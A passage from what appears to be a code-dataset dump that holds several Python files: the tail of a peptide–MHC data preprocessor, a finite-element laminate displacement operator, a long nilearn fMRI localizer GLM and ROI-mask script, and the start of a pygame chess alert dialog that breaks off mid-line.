set(mhcs_peptides).intersection(set(mhcs_mhcs))\n\n return list(inter_set)\n\n\ndef merge_valid_data(peptides_tuple, mhcs_tuple, valid_mhcs):\n \"\"\"\n Merge the (valid) mhcs with the peptide experiments.\n \"\"\"\n # Get the indices of the peptide experiments that are done with valid MHCs.\n peptides_indices = [index for index, mhc in enumerate(peptides_tuple[0]) if mhc in valid_mhcs]\n\n result = []\n for index in peptides_indices:\n # Create data entry and append to the results\n mhc_name = peptides_tuple[0][index] # MHC name\n full_entry = [\n mhc_name, # MHC name\n peptides_tuple[1][index], # Peptide sequence\n mhcs_tuple[1][mhcs_tuple[0].index(mhc_name)], # MHC sequence\n peptides_tuple[2][index] # Binding result\n ]\n\n result.append(full_entry)\n\n return result\n\n\ndef main(mhc_file, peptide_file):\n \"\"\"\n Main function\n \"\"\"\n # Collect and clean MHC data\n raw_mhc_data = read_data(mhc_file)\n mhcs_tuple = mhc_data(raw_mhc_data)\n\n # Collect and clean experimental peptide data\n raw_binding_data = read_data(peptide_file)\n peptides_tuple = peptide_data(raw_binding_data)\n\n # Drop all useless data\n useful_mhcs = get_valid_mhc_names(peptides_tuple, mhcs_tuple)\n\n # Merge the remaining (valid) data\n training_data = merge_valid_data(peptides_tuple, mhcs_tuple, useful_mhcs)\n\n # Write the data to a file\n # Size limit set to 500k = larger than total data = process all\n write_all_2_file(\"TrainingDataAll.csv\", training_data, 500000)\n # write_peplen10_2_file(\"Peplen10TrialFile.csv\", training_data, 500000)\n # write_peplen9_2_file(\"Peplen9TrialFile.csv\", training_data, 500000)\n # write_A_2_file(\"ATrialFile.csv\", training_data, 500000)\n # write_B_2_file(\"BTrialFile.csv\", training_data, 500000)\n # write_C_2_file(\"CTrialFile.csv\", training_data, 500000)\n\n print(str(len(training_data)) + \" usefull entries found available\")\n","sub_path":"src/preprocess/Data.py","file_name":"Data.py","file_ext":"py","file_size_in_byte":7994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"197616223","text":"import numpy as np\nimport scipy.sparse as sparse\n\n\nclass LaminateDisplacement(object):\n\n def __init__(self, fem, coords):\n\n self._elements = fem.dof.dof_elements\n self._xtip = coords[0]\n self._ytip = coords[1]\n self._a = fem.a # distance in um\n self._b = fem.b # distance in um\n self._dimension = fem.dof.n_mdof\n \n # Initial values of the operator.\n self._assemble(self._operator_element)\n\n \n def get_operator(self):\n \n return self._opr\n \n \n def _assemble(self, element_func):\n \n num = 20 * len(self._elements)\n row = np.zeros(num)\n col = np.zeros(num) \n val = np.zeros(num)\n ntriplet = 0\n \n for e in self._elements:\n dof = e.mechanical_dof\n ge = element_func(e)\n if ge is not None:\n for ii in range(20):\n row[ntriplet] = 0\n col[ntriplet] = dof[ii]\n val[ntriplet] = ge[0, ii]\n ntriplet += 1\n\n shape = (1, self._dimension)\n self._opr = sparse.coo_matrix((val, (row, col)), shape=shape).tocsr()\n \n \n def _operator_element(self, element):\n \n x0 = element.element.i + 0.5\n y0 = element.element.j + 0.5\n xi = (self._xtip / self._a - 2 * x0) \n eta = (self._ytip / self._b - 2 * y0) \n \n #if (x0 == 29.5 or x0 == 30.5) and (y0 == 59.5):\n # print(xi, eta)\n # print(self._xtip, self._ytip)\n # print(self._xtip - 2 * self._a * x0)\n \n if -1 < xi <= 1 and -1 < eta <= 1:\n xi_sign = np.array([-1, 1, 1, -1])\n eta_sign = np.array([-1, -1, 1, 1])\n n = 0.25 * (1 + xi_sign * xi) * (1 + eta_sign * 
eta)\n ge = np.array([[0, 0, n[0], 0, 0, 0, 0, n[1], 0, 0, 0, 0, n[2], 0, 0, 0, 0, n[3], 0, 0]])\n return ge\n \n return None\n","sub_path":"microfem/analysis_laminate_displacement.py","file_name":"analysis_laminate_displacement.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168317783","text":"# To suppress warnings\n#!/usr/bin/env python -W ignore::DeprecationWarning\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.filterwarnings('ignore')\n### Suppressing the warnings, does not seem to work...\n\n# Import modules\nimport matplotlib as mpl # to fix the runtime error on Mac (i.e. Python not installed as a framework)\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import ion\nimport pandas as pd\nimport os\nimport nilearn as nil\nimport numpy as np\nimport math\nimport gc # to garbage collect unreferenced memory use gc.collect()\nfrom numpy import array\nfrom os.path import join\nfrom nistats.first_level_model import FirstLevelModel, run_glm\nfrom nistats.design_matrix import make_first_level_design_matrix\nfrom nistats.reporting import plot_contrast_matrix\nfrom nistats.reporting import plot_design_matrix\nfrom nistats.reporting import get_clusters_table\nfrom nistats.contrasts import compute_contrast\nfrom nistats.second_level_model import SecondLevelModel\nfrom nilearn.plotting import plot_stat_map, plot_anat, plot_img, show\nfrom nilearn import image, masking\nfrom nilearn.image import math_img\n\n# Run the following analyses\nplot_design = False\nplot_zMap = False\nplot_FPR = False\nplot_FDR = False\nplot_FWER = False\nplot_clusterCorrect = False\nclusterReport = False\nplot_surface = False\npause_analysis = False\nplot_all = True\nmake_mask = True\nmake_mask_plot = False\nsecond_level = True\n\n# Set parameters\nthreshold = 1.96 # threshold for the localizer masks as well as plotting // for t contrast = 2.3 and z contrast = 1.96 for p = .05\nt_r = 0.7 # Repetition rate\n\n# Set paths and create folders\nderDataFolder = '/Users/michlf/NRoST_analysis/derivatives/'\nrawDataFolder = '/Volumes/VUHDD/NROST_analysis/'\noutdir = 'results'\nif not os.path.exists(rawDataFolder+outdir+'/figures/'):\n try:\n os.makedirs(rawDataFolder+outdir+'/figures/')\n except:\n pass\n\n# Let's go\nif any('sub-' in s for s in os.listdir(rawDataFolder)): # check whether there is any subject data\n\n # Preparations\n os.chdir(derDataFolder+'fmriprep/')\n folderlist = next(os.walk('.'))[1]\n folderlist.sort()\n os.chdir(rawDataFolder)\n subList = []\n z_map_all = []\n model_all = []\n \n for i in range(len(folderlist)):\n try:\n subList.append(folderlist[i].split(\"sub-\",1)[1])\n nrSubj = folderlist[i].split(\"sub-\",1)[1]\n print('\\n...running subject {0}...\\n'.format(nrSubj))\n # Get entire run and average across it\n try:\n fmri_img = image.concat_imgs(derDataFolder+'fmriprep/sub-{0}/ses-01/func/sub-{0}_ses-01_task-Localizer_run-9_bold_space-MNI152NLin2009cAsym_preproc.nii'.format(nrSubj))\n mean_img = image.mean_img(derDataFolder+'fmriprep/sub-{0}/ses-01/func/sub-{0}_ses-01_task-Localizer_run-9_bold_space-MNI152NLin2009cAsym_preproc.nii'.format(nrSubj))\n events = pd.read_csv(rawDataFolder+'sub-{0}/ses-01/func/sub-{0}_ses-01_task-Localizer_run-9_events.tsv'.format(nrSubj), sep='\\t')\n # Get confounds file and drop unnecessary confounds\n # Gilles recommended for my design aComCors and FD. 
We can use all derivatives from aComCor as well because the t_r is so low. \n # We also include the six motion parameters (X,Y,Z,and three rotations)\n # I read somewhere that averaging FD on group level for the conditions is also beneficial (I guess for second level analysis)\n confounds = pd.read_csv(derDataFolder+'fmriprep/sub-{0}/ses-01/func/sub-{0}_ses-01_task-Localizer_run-9_bold_confounds.tsv'.format(nrSubj), \n usecols=['FramewiseDisplacement','aCompCor00','aCompCor01','aCompCor02','aCompCor03','aCompCor04','aCompCor05',\n 'Cosine00', 'Cosine01', 'Cosine02', 'Cosine03', 'X','Y','Z','RotX','RotY','RotZ'], sep='\\t')\n except:\n fmri_img = image.concat_imgs(derDataFolder+'fmriprep/sub-{0}/ses-02/func/sub-{0}_ses-02_task-Localizer_run-9_bold_space-MNI152NLin2009cAsym_preproc.nii'.format(nrSubj))\n mean_img = image.mean_img(derDataFolder+'fmriprep/sub-{0}/ses-02/func/sub-{0}_ses-02_task-Localizer_run-9_bold_space-MNI152NLin2009cAsym_preproc.nii'.format(nrSubj))\n events = pd.read_csv(rawDataFolder+'sub-{0}/ses-02/func/sub-{0}_ses-02_task-Localizer_run-9_events.tsv'.format(nrSubj), sep='\\t')\n confounds = pd.read_csv(derDataFolder+'fmriprep/sub-{0}/ses-02/func/sub-{0}_ses-02_task-Localizer_run-9_bold_confounds.tsv'.format(nrSubj), \n usecols=['FramewiseDisplacement','aCompCor00','aCompCor01','aCompCor02','aCompCor03','aCompCor04','aCompCor05',\n 'Cosine00', 'Cosine01', 'Cosine02', 'Cosine03', 'X','Y','Z','RotX','RotY','RotZ'], sep='\\t')\n\n except Exception as e:\n print('', e, '')\n continue # if not a subject folder or no localizer image, move on to next iteration\n\n # The first TR cannot have a value for FD, so we set it to the value of the second slice\n confounds['FramewiseDisplacement'].iloc[0] = confounds['FramewiseDisplacement'].iloc[1]\n\n # Create first level model\n fmri_glm = FirstLevelModel(t_r=t_r,\n noise_model='ar1',\n standardize=False,\n hrf_model='glover',\n drift_model='cosine',\n period_cut=160,\n subject_label='sub-{0}'.format(nrSubj),\n mask=None,\n minimize_memory=True,\n n_jobs=-1)\n fmri_glm = fmri_glm.fit(fmri_img, events, confounds)\n design_matrix = fmri_glm.design_matrices_[0]\n\n if plot_design:\n # Plot design matrix\n plot_design_matrix(design_matrix) \n\n # Save the matrix image to disc\n #plot_design_matrix(design_matrix, output_file=join(outdir, 'design_matrix.png'))\n\n # Plot expected response to negative cows\n plt.plot(design_matrix['dresserReal1'])\n plt.xlabel('scan')\n plt.title('Expected dresser1 intact response')\n\n # Detect voxels with significant effects fro positive vs drop contrast\n otherRegressors = [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.] 
# not conditions\n            conditions = {\n                'intact': array([1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n                                 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n                                 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.]\n                    +otherRegressors),\n                'scrambled': array([0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n                                    0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n                                    0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n                                    ]+otherRegressors),\n                'fixation': array([0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n                                   0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n                                   1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n                                   ]+otherRegressors),\n            }\n\n            #intact_minus_scrambled = conditions['scrambled'] - conditions['fixation']\n            #intact_minus_scrambled = conditions['intact'] - conditions['fixation']\n            intact_minus_scrambled = conditions['intact'] - conditions['scrambled']\n\n            if plot_design:\n                plot_contrast_matrix(intact_minus_scrambled, design_matrix=design_matrix)\n\n            eff_map = fmri_glm.compute_contrast(intact_minus_scrambled,\n                                                output_type='effect_size')\n\n            z_map = fmri_glm.compute_contrast(intact_minus_scrambled,\n                                              output_type='z_score')\n            \n            t_map = fmri_glm.compute_contrast(intact_minus_scrambled,\n                                              output_type='stat') # stat corresponds to t map\n\n            ###############################################################################\n            # Plot thresholded z scores map.\n            #\n            # We display it on top of the average\n            # functional image of the series (could be the anatomical image of the\n            # subject). We arbitrarily use a threshold of 3.0 in z-scale. We'll\n            # see later how to use corrected thresholds. We choose to display 3\n            # axial views: display_mode='z', cut_coords=3\n            if plot_zMap:\n                plot_stat_map(z_map, bg_img=mean_img, threshold=3.0,\n                              display_mode='z', cut_coords=3, black_bg=True,\n                              title='Sub{0}: Intact vs. scrambled (Z>3)'.format(nrSubj))\n                plt.show()\n\n            ###############################################################################\n            # Statistical significance testing. One should worry about the\n            # statistical validity of the procedure: here we used an arbitrary\n            # threshold of 3.0 but the threshold should provide some guarantees on\n            # the risk of false detections (aka type-1 errors in statistics). One\n            # first suggestion is to control the false positive rate (fpr) at a\n            # certain level, e.g. 0.001: this means that there is a 0.1% chance of\n            # declaring an inactive voxel active.\n\n            if plot_FPR:\n                from nistats.thresholding import map_threshold\n                _, threshold = map_threshold(z_map, level=.001, height_control='fpr')\n                print('Uncorrected p<0.001 threshold: %.3f' % threshold)\n                plot_stat_map(z_map, bg_img=mean_img, threshold=threshold,\n                              display_mode='z', cut_coords=3, black_bg=True,\n                              title='Sub{0}: Intact vs. scrambled (p<0.001)'.format(nrSubj))\n                plt.show()\n
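\n            # An added, hedged illustration (not in the original script): the fpr cutoff on a\n            # z map is just the normal survival function, e.g.:\n            #     from scipy.stats import norm\n            #     norm.isf(0.001)  # ~3.0902, should match the 'fpr' threshold printed above\n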
\n            ###############################################################################\n            # The problem is that with this you expect 0.001 * n_voxels to show up\n            # while they're not active --- tens to hundreds of voxels. A more\n            # conservative solution is to control the family wise error rate,\n            # i.e. the probability of making even one false detection, say at\n            # 5%. For that we use the so-called Bonferroni correction\n\n            if plot_FWER:\n                _, threshold = map_threshold(z_map, level=.05, height_control='bonferroni')\n                print('Bonferroni-corrected, p<0.05 threshold: %.3f' % threshold)\n                plot_stat_map(z_map, bg_img=mean_img, threshold=threshold,\n                              display_mode='z', cut_coords=3, black_bg=True,\n                              title='Sub{0}: Intact vs. scrambled (p<0.05, corrected)'.format(nrSubj))\n                plt.show()\n\n            ###############################################################################\n            # This is quite conservative indeed ! A popular alternative is to\n            # control the false discovery rate, i.e. the expected proportion of\n            # false discoveries among detections. This is called the false\n            # discovery rate\n\n            if plot_FDR:\n                _, threshold = map_threshold(z_map, level=.05, height_control='fdr')\n                print('False Discovery rate = 0.05 threshold: %.3f' % threshold)\n                plot_stat_map(z_map, bg_img=mean_img, threshold=threshold,\n                              display_mode='z', cut_coords=3, black_bg=True,\n                              title='Sub{0}: Intact vs. scrambled (fdr=0.05)'.format(nrSubj))\n                plt.show()\n\n            ###############################################################################\n            # Finally people like to discard isolated voxels (aka \"small\n            # clusters\") from these images. It is possible to generate a\n            # thresholded map with small clusters removed by providing a\n            # cluster_threshold argument. Here clusters smaller than 10 voxels\n            # will be discarded.\n\n            if plot_clusterCorrect:\n                clean_map, threshold = map_threshold(\n                    z_map, level=.05, height_control='fdr', cluster_threshold=10)\n                plot_stat_map(clean_map, bg_img=mean_img, threshold=threshold,\n                              display_mode='z', cut_coords=3, black_bg=True,\n                              title='Sub{0}: Intact vs. scrambled (fdr=0.05), clusters > 10 voxels'.format(nrSubj))\n                plt.show()\n\n            ###############################################################################\n            # Report the found positions in a table\n            if clusterReport:\n                table = get_clusters_table(z_map, stat_threshold=threshold,\n                                           cluster_threshold=10)\n                print(table)\n\n            if plot_surface:\n                ###############################################################################\n                # Let's do a surface-based first level analysis\n                #########################################################################\n                # Project the fMRI image to the surface\n                # -------------------------------------\n                #\n                # For this we need to get a mesh representing the geometry of the\n                # surface. 
we could use an individual mesh, but we first resort to a\n # standard mesh, the so-called fsaverage5 template from the Freesurfer\n # software.\n fsaverage = nil.datasets.fetch_surf_fsaverage(mesh='fsaverage5') # fsaverage is high, fsaverage5 is low resolution\n\n #########################################################################\n # The projection function simply takes the fMRI data and the mesh.\n # Note that those correspond spatially, are they are bothin MNI space.\n full_run = '/Users/michlf/NROST_analysis/derivatives/fmriprep/sub-{0}/ses-01/func/sub-{0}_ses-01_task-Localizer_run-9_bold_space-MNI152NLin2009cAsym_preproc.nii'.format(nrSubj)\n texture = nil.surface.vol_to_surf(full_run, fsaverage.pial_right)\n\n #########################################################################\n # Perform first level analysis\n # ----------------------------\n #\n # This involves computing the design matrix and fitting the model.\n # We start by specifying the timing of fMRI frames\n n_scans = texture.shape[1]\n frame_times = t_r * (np.arange(n_scans) + .5)\n\n #########################################################################\n # Create the design matrix\n #\n # We specify an hrf model containing SPM (for now not Glover model and its time derivative)\n # the drift model is implicitly a cosine basis with period cutoff 128s.\n # MF: We can also add regressors of choice with add_regs & add_reg_names, so we will add some confound regressors\n design_matrix = make_first_level_design_matrix(frame_times,\n events=events,\n hrf_model='spm',\n add_regs=confounds.values,\n add_reg_names=list(confounds))\n\n #########################################################################\n # Setup and fit GLM.\n # Note that the output consists in 2 variables: `labels` and `fit`\n # `labels` tags voxels according to noise autocorrelation.\n # `estimates` contains the parameter estimates.\n # We keep them for later contrast computation.\n labels, estimates = run_glm(texture.T, design_matrix.values)\n\n #########################################################################\n # Estimate contrasts\n # ------------------\n # Specify the contrasts\n # For practical purpose, we first generate an identity matrix whose size is\n # the number of columns of the design matrix\n otherRegressors = [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.] 
# not conditions\n basic_contrasts = {\n 'intact': array([1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.]\n +otherRegressors),\n 'scrambled': array([0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,\n ]+otherRegressors),\n 'fixation': array([0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\n ]+otherRegressors),\n }\n\n contrasts = {\n \"scrambled vs fixation\": basic_contrasts['scrambled'] - basic_contrasts['fixation'],\n \"intact vs fixation\": basic_contrasts['intact'] - basic_contrasts['fixation'],\n \"intact vs scrambled\": basic_contrasts['intact'] - basic_contrasts['scrambled']\n }\n\n #########################################################################\n # contrast estimation\n\n # iterate over contrasts\n for index, (contrast_id, contrast_val) in enumerate(contrasts.items()):\n print(' Contrast % i out of %i: %s, right hemisphere' %\n (index + 1, len(contrasts), contrast_id))\n # compute contrast-related statistics\n contrast = compute_contrast(labels, estimates, contrast_val,\n contrast_type='t')\n # we present the Z-transform of the t map\n z_score = contrast.z_score() # present Z-transformed t map\n #z_score = contrast.effect # present t map\n # we plot it on the surface, on the inflated fsaverage mesh,\n # together with a suitable background to give an impression\n # of the cortex folding.\n nil.plotting.plot_surf_stat_map(\n fsaverage.infl_right, z_score, hemi='right',\n title=contrast_id, colorbar=True,\n threshold=2.3, bg_map=fsaverage.sulc_right)\n\n #########################################################################\n # Analysing the left hemisphere\n # -----------------------------\n\n #########################################################################\n # Project the fMRI data to the mesh\n texture = nil.surface.vol_to_surf(full_run, fsaverage.pial_left)\n\n #########################################################################\n # Estimate the General Linear Model\n labels, estimates = run_glm(texture.T, design_matrix.values)\n\n #########################################################################\n # Create contrast-specific maps\n for index, (contrast_id, contrast_val) in enumerate(contrasts.items()):\n print(' Contrast % i out of %i: %s, left hemisphere' %\n (index + 1, len(contrasts), contrast_id))\n # compute contrasts\n contrast = compute_contrast(labels, estimates, contrast_val,\n contrast_type='t')\n z_score = contrast.z_score()\n # Plot the result\n nil.plotting.plot_surf_stat_map(\n fsaverage.infl_left, z_score, hemi='left',\n title=contrast_id, colorbar=True,\n threshold=2.3, bg_map=fsaverage.sulc_left)\n\n # Other plotting\n # from nilearn import datasets\n # img = datasets.fetch_localizer_button_task()['tmap']\n # view = nil.plotting.view_img_on_surf(z_score, surf_mesh='fsaverage')\n\n # view.open_in_browser()\n\n nil.plotting.show()\n\n if make_mask:\n ### Compute anatomically constraint ROI based on functional localizer\n # An important question here is the moment of resampling\n # Do we resample before thresholding 
or after?\n # Resampling seems to lower activity of individual voxel\n # because the response becomes smeared out.\n # Alternatively, we could try resampled the template\n # to the preprocessed data instead of the other way around\n # However, original MNI space seems to be of the same size as the template\n # (thus larger) than the MNI coregistered preprocessed date from fMRI prep\n\n # Load anatomical atlas of pF\n atlas = image.load_img('/Users/michlf/Documents/GitHub/fMRI_NRoST/analysis/LOCatlas.nii.gz')\n atlasBool = image.load_img('/Users/michlf/Documents/GitHub/fMRI_NRoST/analysis/LOCatlas.nii.gz').get_data().astype(bool)\n # Resample contrast image to size of the atlas\n resampled_zmap = image.resample_to_img(z_map, atlas)\n # Threshold the contrast image and make an Niim object again\n zmapPreBool = resampled_zmap.dataobj.copy() # copy instead of referencing\n zmapPreBool[zmapPreBool < threshold] = 0 # Thresholded for checking\n zmapThreshed = image.new_img_like(resampled_zmap, zmapPreBool)\n zmapBool = (resampled_zmap.dataobj[:] > threshold) # Thresholded boolean for intersection\n zmapThreshedBool = image.new_img_like(resampled_zmap, zmapBool.astype(np.int))\n # Intersect boolean arrays of contrast image and anatomical image and reformat in Niim objects\n intersection = np.logical_and(zmapBool, atlasBool)\n intersection_img = image.new_img_like(resampled_zmap, intersection.astype(np.int))\n if make_mask_plot: # commenting out the show command will lead to memory overflow due to too many figures\n # Check the maps \n nil.plotting.plot_glass_brain(atlas, colorbar=True, title='Original Harvard atlas of posterior temporal fusiform gyrus',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(z_map, colorbar=True, title='contrast image',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(resampled_zmap, colorbar=True, title='resampled contrast image',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(zmapThreshed, colorbar=True, title='contrast image thresholded at {0}'.format(threshold),\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(zmapThreshedBool, colorbar=True, title='contrast image thresholded at {0} in Boolean'.format(threshold),\n plot_abs=False, display_mode='ortho')\n # Plot anatomically constraint functional localizer\n nil.plotting.plot_glass_brain(intersection_img, colorbar=True, title='Anatomically constraint functional localizer mask',\n plot_abs=False, display_mode='ortho')\n nil.plotting.show()\n print('','time to inspect the plots','')\n # Assess the number of voxels in the mask\n # Katya used 31 voxel before substituting the intersection mask with the atlas map\n # Not sure whether that was 31 per hemisphere...\n if 'mask_info' in locals():\n mask_info = np.vstack( (mask_info, np.array([nrSubj, np.sum(zmapBool), np.sum(intersection)])) )\n else:\n mask_info = np.array([nrSubj, np.sum(zmapBool), np.sum(intersection)])\n print(mask_info)\n \n # We can now save the roi as mask\n # Note that we could subsegment the mask in connected regions\n # For details see tutorial https://nilearn.github.io/auto_examples/04_manipulating_images/plot_roi_extraction.html\n intersection_img.to_filename(join(outdir,'LOCmask_sub{0}.nii.gz'.format(nrSubj))) # or nibabel.save()\n\n # Pause to inspect\n if pause_analysis:\n input(\"Press Enter to continue...\")\n \n # Store each subjects data\n z_map_all.append(z_map)\n model_all.append(fmri_glm)\n\n # Plot first model for each subject\n if plot_all:\n 
fig1, axes1 = plt.subplots(nrows=2, ncols=math.ceil(len(z_map_all)/2), figsize=(8, 4.5))\n print(os.getcwd())\n for i in range(len(z_map_all)):\n # Using the following way of masking works if you provide the keyword threshold to the plot\n thresh_1stModel = math_img(\"np.ma.masked_less(img, [{0}])\".format(threshold), img=z_map_all[i])\n nil.plotting.plot_glass_brain(thresh_1stModel, colorbar=True, threshold=threshold,\n title=(model_all[i].subject_label),\n axes=axes1[int(i / math.ceil(len(z_map_all)/2)), int(i % math.ceil(len(z_map_all)/2))],\n plot_abs=False, display_mode='lr')\n nil.plotting.plot_glass_brain(thresh_1stModel, colorbar=True, threshold=threshold,\n title=(model_all[i].subject_label),\n plot_abs=False, display_mode='lr',\n output_file=outdir+'/figures/{0}.pdf'.format(model_all[i].subject_label))\n fig1.suptitle('subjects z_map intact vs. scrambled (unc z<{0})'.format(threshold))\n #nil.plotting.show()\n\n # Second level analysis (this still needs some work)\n if second_level:\n second_level_input = model_all\n second_level_model = SecondLevelModel()\n second_level_model = second_level_model.fit(second_level_input)\n zmap = second_level_model.compute_contrast(first_level_contrast=intact_minus_scrambled, output_type='z_score')\n \n # Plot\n nil.plotting.plot_glass_brain(zmap, colorbar=True, threshold=threshold,\n title='Object network (only z threshold of +-{0})'.format(threshold),\n plot_abs=False, display_mode='ortho')\n #nil.plotting.show()\n # Plot only positive z voxels above threshold\n masked_zmap = math_img(\"np.ma.masked_less(img, [{0}])\".format(threshold), img=zmap)\n nil.plotting.plot_glass_brain(masked_zmap, colorbar=True, threshold=None,\n title='Object network (only masked z<{0})'.format(threshold),\n plot_abs=False, display_mode='ortho')\n #nil.plotting.show()\n # Plot only positive z voxels\n masked_zmap1 = math_img(\"np.ma.masked_less(img, [{0}])\".format(threshold), img=zmap)\n nil.plotting.plot_glass_brain(masked_zmap1, colorbar=True, threshold=-threshold,\n title='Object network (masked z<{0} and thresholded at -{0}'.format(threshold),\n plot_abs=False, display_mode='ortho')\n #nil.plotting.show()\n\n # Localizer mask for 2nd level\n atlas1 = image.load_img('/Users/michlf/Documents/GitHub/fMRI_NRoST/analysis/LOCatlas.nii.gz')\n # resample the lower res zmap to the higher res atlas\n resampled_zmap = image.resample_to_img(zmap, atlas1)\n # Thresholdand make an Niim object again\n zmapPreBool = resampled_zmap.dataobj.copy()\n zmapPreBool[zmapPreBool < threshold] = 0\n zmapThreshed = image.new_img_like(resampled_zmap, zmapPreBool)\n zmapBool = (resampled_zmap.dataobj > threshold)\n zmapThreshedBool = image.new_img_like(resampled_zmap, zmapBool.astype(np.int))\n # Check it\n nil.plotting.plot_glass_brain(zmap, colorbar=True, title='original zmap',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(resampled_zmap, colorbar=True, title='resampled zmap',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(zmapThreshed, colorbar=True, title='original zmap thresholded at {0}'.format(threshold),\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_glass_brain(zmapThreshedBool, colorbar=True, title='original zmap thresholded at {0} in Boolean'.format(threshold),\n plot_abs=False, display_mode='ortho')\n #nil.plotting.show()\n # Now make all boolean so that we intersect the maps\n atlasBool = image.load_img('/Users/michlf/Documents/GitHub/fMRI_NRoST/analysis/LOCatlas.nii.gz').get_data().astype(bool)\n # Intersect and 
make it Niim object\n intersection = np.logical_and(zmapBool, atlasBool)\n atlasBoolPlt = image.new_img_like(resampled_zmap, atlasBool.astype(np.int))\n intersection_img = image.new_img_like(resampled_zmap, intersection.astype(np.int))\n # Plot the map\n nil.plotting.plot_glass_brain(atlas1, colorbar=True, title='Original Harvard atlas of posterior temporal fusiform gyrus',\n plot_abs=False, display_mode='ortho')\n nil.plotting.plot_roi(atlas1, title='Original Harvard atlas',\n display_mode='ortho')\n nil.plotting.plot_roi(atlasBoolPlt, title='Original Harvard atlas (boolean)',\n display_mode='ortho')\n nil.plotting.plot_glass_brain(intersection_img, colorbar=True, title='Intersection map',\n plot_abs=False, display_mode='ortho')\n nil.plotting.show()\n # We can now save the roi as mask\n # Note that we could subsegment the mask in connected regions\n # For details see tutorial https://nilearn.github.io/auto_examples/04_manipulating_images/plot_roi_extraction.html\n intersection_img.to_filename(join(outdir,'LOCmask_2ndlevel.nii.gz'))\n # Let's also save the resampled anatomical mask\n atlasBoolPlt.to_filename(join(outdir,'LOCmask_anat.nii.gz'))\n # Assess the number of voxels in the mask\n # Katya used 31 voxel before substituting the intersection mask with the atlas map\n # Not sure whether that was 31 per hemisphere...\n if 'mask_info' in locals():\n mask_info = np.vstack( (mask_info, np.array([0, np.sum(zmapBool), np.sum(intersection)])) )\n else:\n mask_info = np.array([nrSubj, np.sum(zmapBool), np.sum(intersection)])\n print(mask_info)\n\n# END\n","sub_path":"analysis/GLM_testing_loc.py","file_name":"GLM_testing_loc.py","file_ext":"py","file_size_in_byte":31666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"277543552","text":"from .values.dimens import *\nfrom .values.colors import CHESS_WHITE, AlertDialogBG, AlertDialogFG\nfrom .values.assets import gameFont\n\n\nclass AlertDialog:\n def __init__(self, win, alertText, title='Chess', positiveBtn=None, negativeBtn=None):\n self.win = win\n self.alertText = alertText\n self.title = title\n self.pBtn = positiveBtn\n self.nBtn = negativeBtn\n self.pBtnRect = None\n self.nBtnRect = None\n\n def show(self):\n pygame.draw.rect(self.win, AlertDialogBG, ((AlertDialogStartX, AlertDialogStartY),\n (AlertDialogLenX, AlertDialogLenY)),\n border_radius=DialogTitleHeight // 2)\n pygame.draw.rect(self.win, AlertDialogFG,\n ((DialogInX, DialogInY), (DialogInLenX, DialogInLenY)),\n border_bottom_left_radius=DialogTitleHeight // 2,\n border_bottom_right_radius=DialogTitleHeight // 2)\n\n self.drawText(self.title, 50, AlertDialogStartX + AlertDialogLenX // 2, AlertDialogStartY +\n (dialogPad + DialogTitleHeight) // 2, CHESS_WHITE, font=gameFont, centre='XY')\n\n if '*' not in self.alertText:\n self.drawText(self.alertText, 40, DialogInX + DialogInLenX // 2, DialogInY + SquareDimen,\n CHESS_WHITE, centre=True)\n else:\n texts = self.alertText.split('*')\n length = SquareDimen // (len(texts) + (len(texts) % 2))\n for txt in texts:\n self.drawText(txt, 30, DialogInX + DialogInLenX // 2, DialogInY + length, CHESS_WHITE, centre=True)\n length += SquareDimen // 2\n\n btnX = DialogInX + int(0.125 * DialogInLenX)\n btnLenY = int(DialogInLenY * 0.2)\n btnY = 